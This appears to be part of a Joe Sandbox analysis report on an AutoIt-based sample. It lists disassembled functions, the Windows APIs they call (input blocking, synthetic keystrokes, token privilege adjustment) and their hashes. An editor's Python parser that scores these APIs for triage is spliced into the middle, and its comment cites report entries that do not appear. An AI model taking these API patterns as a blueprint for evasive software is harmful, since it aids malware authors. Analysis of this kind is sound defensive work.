                                                                    • Opcode ID: 4eb56cca7ff6c37f73d6a354dccea63b101d44589d219d54d8260d7002257885
                                                                    • Instruction ID: a791772a4ead227f22f1b96c3f8e4bbc35dd422787047cbf4afe1126a925a0a9
                                                                    • Opcode Fuzzy Hash: 4eb56cca7ff6c37f73d6a354dccea63b101d44589d219d54d8260d7002257885
                                                                    • Instruction Fuzzy Hash: DBF0ECB16042252AE71057765C4DFDB379DEFC5761F000165F509D2281D9609944D7B0
                                                                    APIs
                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0094B25D
                                                                    • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 0094B270
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: InputSendkeybd_event
                                                                    • String ID:
                                                                    • API String ID: 3536248340-0
                                                                    • Opcode ID: 5ec22f9b2d2942f1e14ccd81bd7e6a8b6b296165a35725d59bf6a0ba73809ff8
                                                                    • Instruction ID: 23ebc24e5e4ba15f68f65c15f944624fbec23e323beced1771bab034de0aaf9e
                                                                    • Opcode Fuzzy Hash: 5ec22f9b2d2942f1e14ccd81bd7e6a8b6b296165a35725d59bf6a0ba73809ff8
                                                                    • Instruction Fuzzy Hash: 56F01D7181424EABDB059FA0C805BAE7BB4FF14305F008409F965A5191D779D6519F94
                                                                    APIs
                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,009411FC), ref: 009410D4
                                                                    • CloseHandle.KERNEL32(?,?,009411FC), ref: 009410E9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                                    • String ID:
                                                                    • API String ID: 81990902-0
                                                                    • Opcode ID: 5261c5571420b38ef9bae732daa4e08936549c09e8c76e982d5fb74fcdd4032b
                                                                    • Instruction ID: e2e9efc095dfae83b282a4a6a5ae04a75bdd7cbee67ab7338c5a2c0491929ecf
                                                                    • Opcode Fuzzy Hash: 5261c5571420b38ef9bae732daa4e08936549c09e8c76e982d5fb74fcdd4032b
                                                                    • Instruction Fuzzy Hash: 32E0BF72018610EEF7252B65FC05E7777A9FF04310B14882DF6A5D44B1DB626CD0EB50
                                                                    Strings
                                                                    • Variable is not of type 'Object'., xrefs: 00930C40
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Variable is not of type 'Object'.
                                                                    • API String ID: 0-1840281001
                                                                    • Opcode ID: 3b9354cf4ff31fe9c7bd527eba65765b64c9fe258ae9113bb91ec9c200f50c10
                                                                    • Instruction ID: 32025803e6dc25c8dd664b9d3f41975fe865c1ea75f4209b5098b9a0edb42ae1
                                                                    • Opcode Fuzzy Hash: 3b9354cf4ff31fe9c7bd527eba65765b64c9fe258ae9113bb91ec9c200f50c10
                                                                    • Instruction Fuzzy Hash: 91328B30E002589FCF14DF95C891AEDB7B9FF46308F208059E816AB292DB75AD46CB61
                                                                    APIs
                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00916766,?,?,00000008,?,?,0091FEFE,00000000), ref: 00916998
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionRaise
                                                                    • String ID:
                                                                    • API String ID: 3997070919-0
                                                                    • Opcode ID: ff73efc54317736920aa50a831c8d88d0505f14173cb8ca294f5089ecba0080c
                                                                    • Instruction ID: 39976bf149d9aafd7e17483b39f5305a3773629727e216d00c98f2f64ce14b77
                                                                    • Opcode Fuzzy Hash: ff73efc54317736920aa50a831c8d88d0505f14173cb8ca294f5089ecba0080c
                                                                    • Instruction Fuzzy Hash: 99B13C31A10609DFD715CF28C486BA57BE0FF45364F298698E8E9CF2A2C335E991CB40
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID: 0-3916222277
                                                                    • Opcode ID: b6ce1fa55431c7f974e29be8c89fbfd38ba88c11a60ddde8d140d22a0f5de794
                                                                    • Instruction ID: e85d3a4d3bb8b0ff5298ec5e5ff6941be1becf46239c9f85521ff08985aa5f66
                                                                    • Opcode Fuzzy Hash: b6ce1fa55431c7f974e29be8c89fbfd38ba88c11a60ddde8d140d22a0f5de794
                                                                    • Instruction Fuzzy Hash: D6124E759002299BCB14CF68C9806FEB7F5FF58710F14819AE949EB255EB349E81CF90
                                                                    APIs
                                                                    • BlockInput.USER32(00000001), ref: 0095EABD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: BlockInput
                                                                    • String ID:
                                                                    • API String ID: 3456056419-0
                                                                    • Opcode ID: 1795c22639850fa7c3cbeb74a66d989148a24b74bebf5bb53abdb682debee398
                                                                    • Instruction ID: e64c4a21e3dc0559610bb282085a38e2d5d7fac59684c1db928526116d76223b
                                                                    • Opcode Fuzzy Hash: 1795c22639850fa7c3cbeb74a66d989148a24b74bebf5bb53abdb682debee398
                                                                    • Instruction Fuzzy Hash: 07E09A362002009FC300EF6AD804E8AB7EDFF98760F00841AFC0AC7250CAB0E8408B91
                                                                    APIs
                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,009003EE), ref: 009009DA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled
                                                                    • String ID:
                                                                    • API String ID: 3192549508-0
                                                                    • Opcode ID: 72f98d1bbf433826fa9901366d31a052632791720617ebfb83111e509d032e45
                                                                    • Instruction ID: eddb1e0fe77ae660060d07e3f7ede5bf9765c752a4aad2e075b151050108bd06
                                                                    • Opcode Fuzzy Hash: 72f98d1bbf433826fa9901366d31a052632791720617ebfb83111e509d032e45
                                                                    • Instruction Fuzzy Hash:
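                                                                    As an added example (editor's own code, not part of the Joe Sandbox report or its IDA plugin): a small Python parser for the `APIs` bullets in function entries like the FindFirstFileW/FindClose, SendInput/keybd_event, AdjustTokenPrivileges/CloseHandle, BlockInput and SetUnhandledExceptionFilter ones above. It groups the bullets by function, extracts API name, module, argument list and `ref:` address, and scores each function by the APIs it calls so the anti-analysis and privilege-related functions surface first. The embedded excerpt is constructed to mirror the report's line format, and the weights table is an assumed triage heuristic of the editor's, not anything Joe Sandbox computes.

```python
"""Parse the per-function "APIs" bullets of a Joe Sandbox disassembly section
and score each function by the Windows APIs it calls.

Added example, not part of the Joe Sandbox report. SAMPLE is a constructed
excerpt that copies the report's own line format; SUSPICIOUS is the editor's
own triage heuristic (assumption), not a Joe Sandbox signature.
"""
import re

# Constructed excerpt in the report's format: an "APIs" header, one bullet per
# call with module suffix, argument list and "ref:" address, then the next
# header ("Memory Dump Source") which ends the list.
SAMPLE = """\
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 00956918
• FindClose.KERNEL32(00000000), ref: 00956961
Memory Dump Source
• Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
APIs
• SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0094B25D
• keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 0094B270
Memory Dump Source
APIs
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,009411FC), ref: 009410D4
• CloseHandle.KERNEL32(?,?,009411FC), ref: 009410E9
Memory Dump Source
APIs
• BlockInput.USER32(00000001), ref: 0095EABD
Memory Dump Source
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,009003EE), ref: 009009DA
Memory Dump Source
"""

# "• Name.MODULE(arg,arg,...), ref: ADDR"
API_LINE = re.compile(r"^•\s*(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)\s*$")

# Editor's heuristic weights (assumption): description and score per API.
SUSPICIOUS = {
    "BlockInput": ("blocks keyboard/mouse input (anti-analysis)", 3),
    "AdjustTokenPrivileges": ("token privilege adjustment", 2),
    "SendInput": ("synthetic input injection", 1),
    "keybd_event": ("synthetic keystrokes", 1),
    "SetUnhandledExceptionFilter": ("exception filter hook (anti-debug / crash hiding)", 1),
    "RaiseException": ("deliberate exception", 1),
}


def parse_api_entries(text):
    """Return one list per function; each item is (api, module, args, ref)."""
    entries, current, in_apis = [], [], False
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            in_apis, current = True, []
            continue
        if not in_apis:
            continue
        m = API_LINE.match(line)
        if m:
            api, module, args, ref = m.groups()
            current.append((api, module, [a for a in args.split(",") if a], ref))
        else:
            # Any non-API line (e.g. "Memory Dump Source") closes the list.
            in_apis = False
            if current:
                entries.append(current)
    if in_apis and current:
        entries.append(current)
    return entries


def score_entries(entries):
    """Return (score, sorted API names, reasons) for each function."""
    results = []
    for fn in entries:
        names = sorted({api for api, *_ in fn})
        reasons = [SUSPICIOUS[n][0] for n in names if n in SUSPICIOUS]
        score = sum(SUSPICIOUS[n][1] for n in names if n in SUSPICIOUS)
        results.append((score, names, reasons))
    return results


def triage(text, threshold=2):
    """Functions scoring at or above threshold, highest score first."""
    hits = [r for r in score_entries(parse_api_entries(text)) if r[0] >= threshold]
    return sorted(hits, key=lambda r: -r[0])


if __name__ == "__main__":
    for score, names, reasons in triage(SAMPLE):
        print(score, names, "; ".join(reasons))
```

                                                                    Run it against a saved copy of the report's text instead of SAMPLE to get a ranked list of functions to open first in the disassembler; the weights are a starting point to tune, not a verdict.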
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0
                                                                    • API String ID: 0-4108050209
                                                                    • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                    • Instruction ID: 268a52e204e22bf25c1772cea7cdd31a75a5abcca8ced21d63e1340a063aa13d
                                                                    • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                    • Instruction Fuzzy Hash: 98513661F0C6456FDB3885E888997BFE39D9B42370F188909DC86D72C2C615FE41D362
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4f526c3d5bfcf7337b5148fb58ce7c8778efe8f452e67a0af027e9b0288b98cf
                                                                    • Instruction ID: d290b9d7e4eac3ea43c22ce68aff5427cca76e826eba9e32849b4f9af87258e3
                                                                    • Opcode Fuzzy Hash: 4f526c3d5bfcf7337b5148fb58ce7c8778efe8f452e67a0af027e9b0288b98cf
                                                                    • Instruction Fuzzy Hash: 8D320231E2DF064DD7239634D822325A699AFB73C5F15D727F81AB5AA6EB28C4C35200
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    APIs
                                                                    • DeleteObject.GDI32(00000000), ref: 00962B30
                                                                    • DeleteObject.GDI32(00000000), ref: 00962B43
                                                                    • DestroyWindow.USER32 ref: 00962B52
                                                                    • GetDesktopWindow.USER32 ref: 00962B6D
                                                                    • GetWindowRect.USER32(00000000), ref: 00962B74
                                                                    • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00962CA3
                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00962CB1
                                                                    • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00962CF8
                                                                    • GetClientRect.USER32(00000000,?), ref: 00962D04
                                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00962D40
                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00962D62
                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00962D75
                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00962D80
                                                                    • GlobalLock.KERNEL32(00000000), ref: 00962D89
                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00962D98
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00962DA1
                                                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00962DA8
                                                                    • GlobalFree.KERNEL32(00000000), ref: 00962DB3
                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00962DC5
                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,0097FC38,00000000), ref: 00962DDB
                                                                    • GlobalFree.KERNEL32(00000000), ref: 00962DEB
                                                                    • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00962E11
                                                                    • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00962E30
                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00962E52
                                                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0096303F
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                                    • API String ID: 2211948467-2373415609
                                                                    • Opcode ID: 9500cdacdcd28e8c1619db602ddb6372b86007d6f8f52a6f16dfc2f07dcfb152
                                                                    • Instruction ID: 09c3e7fbf53c1db45e2c07387f5ed62b3ef6950428cd30aaf7d459ec6b821b94
                                                                    • Opcode Fuzzy Hash: 9500cdacdcd28e8c1619db602ddb6372b86007d6f8f52a6f16dfc2f07dcfb152
                                                                    • Instruction Fuzzy Hash: 5C027DB2610205EFDB14DF64CD89EAE7BB9FB49710F048158F919AB2A1DB34ED40DB60
                                                                    APIs
                                                                    • SetTextColor.GDI32(?,00000000), ref: 0097712F
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00977160
                                                                    • GetSysColor.USER32(0000000F), ref: 0097716C
                                                                    • SetBkColor.GDI32(?,000000FF), ref: 00977186
                                                                    • SelectObject.GDI32(?,?), ref: 00977195
                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 009771C0
                                                                    • GetSysColor.USER32(00000010), ref: 009771C8
                                                                    • CreateSolidBrush.GDI32(00000000), ref: 009771CF
                                                                    • FrameRect.USER32(?,?,00000000), ref: 009771DE
                                                                    • DeleteObject.GDI32(00000000), ref: 009771E5
                                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 00977230
                                                                    • FillRect.USER32(?,?,?), ref: 00977262
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00977284
                                                                      • Part of subcall function 009773E8: GetSysColor.USER32(00000012), ref: 00977421
                                                                      • Part of subcall function 009773E8: SetTextColor.GDI32(?,?), ref: 00977425
                                                                      • Part of subcall function 009773E8: GetSysColorBrush.USER32(0000000F), ref: 0097743B
                                                                      • Part of subcall function 009773E8: GetSysColor.USER32(0000000F), ref: 00977446
                                                                      • Part of subcall function 009773E8: GetSysColor.USER32(00000011), ref: 00977463
                                                                      • Part of subcall function 009773E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00977471
                                                                      • Part of subcall function 009773E8: SelectObject.GDI32(?,00000000), ref: 00977482
                                                                      • Part of subcall function 009773E8: SetBkColor.GDI32(?,00000000), ref: 0097748B
                                                                      • Part of subcall function 009773E8: SelectObject.GDI32(?,?), ref: 00977498
                                                                      • Part of subcall function 009773E8: InflateRect.USER32(?,000000FF,000000FF), ref: 009774B7
                                                                      • Part of subcall function 009773E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 009774CE
                                                                      • Part of subcall function 009773E8: GetWindowLongW.USER32(00000000,000000F0), ref: 009774DB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                    • String ID:
                                                                    • API String ID: 4124339563-0
                                                                    • Opcode ID: 047db9d496385ab57e873176f69eb21005c117d36a248bd281b026dc6654188e
                                                                    • Instruction ID: 7fbee90d0adae358e43c66eccaa4323688a77bdb3516368b07b4a846cfa2256e
                                                                    • Opcode Fuzzy Hash: 047db9d496385ab57e873176f69eb21005c117d36a248bd281b026dc6654188e
                                                                    • Instruction Fuzzy Hash: 2AA1B2B311C301AFD7009F60DC48A6BBBA9FF49321F104A1DF96A961E1D735E984DB51
                                                                    APIs
                                                                    • DestroyWindow.USER32(?,?), ref: 008F8E14
                                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 00936AC5
                                                                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00936AFE
                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00936F43
                                                                      • Part of subcall function 008F8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,008F8BE8,?,00000000,?,?,?,?,008F8BBA,00000000,?), ref: 008F8FC5
                                                                    • SendMessageW.USER32(?,00001053), ref: 00936F7F
                                                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00936F96
                                                                    • ImageList_Destroy.COMCTL32(00000000,?), ref: 00936FAC
                                                                    • ImageList_Destroy.COMCTL32(00000000,?), ref: 00936FB7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                    • String ID: 0
                                                                    • API String ID: 2760611726-4108050209
                                                                    • Opcode ID: 707cbdb4247b2ebdadb2e490ad3cd5eb83c7ab63e75b7c66c83de32e89501ed9
                                                                    • Instruction ID: 4693afc5f38a6d3c56cb042bdaf3a54ea8522481b3309862b3a4ee09977e7d75
                                                                    • Opcode Fuzzy Hash: 707cbdb4247b2ebdadb2e490ad3cd5eb83c7ab63e75b7c66c83de32e89501ed9
                                                                    • Instruction Fuzzy Hash: C912CA31208245EFDB25CF28D994BBABBF9FB44310F548529F589CB261CB31A891DF91
                                                                    APIs
                                                                    • DestroyWindow.USER32(00000000), ref: 0096273E
                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0096286A
                                                                    • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 009628A9
                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 009628B9
                                                                    • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00962900
                                                                    • GetClientRect.USER32(00000000,?), ref: 0096290C
                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00962955
                                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00962964
                                                                    • GetStockObject.GDI32(00000011), ref: 00962974
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00962978
                                                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00962988
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00962991
                                                                    • DeleteDC.GDI32(00000000), ref: 0096299A
                                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 009629C6
                                                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 009629DD
                                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00962A1D
                                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00962A31
                                                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 00962A42
                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00962A77
                                                                    • GetStockObject.GDI32(00000011), ref: 00962A82
                                                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00962A8D
